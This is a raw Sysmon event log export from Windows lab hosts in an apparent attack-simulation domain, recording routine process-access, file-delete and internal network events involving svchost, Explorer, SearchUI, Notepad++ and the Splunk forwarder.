07:45:02.374{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x80000000000000001046276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A06827D18DBADE228B25200C673BEEE,SHA256=8366AAC553E880849E49D96BF0736AEB3967CE35C7AD2799BF84DDAEFE44FE94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.072{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.072{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63568252C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63568252C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM3
2\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:03.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208A288F3CCD46DC2F8EA9815E4A3889,SHA256=DCD273E3DDD33EC1A3D72CB72052B21CEEB9AA089AEAA54A8718CB4AD255FAF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC82FC1B3C1FA12D32A42E117E6F6ADF,SHA256=18038DE0A0D5A962C79837110964E279CC364352CDAE1BA152C0AE3A400141BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:01.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57165-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001046345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 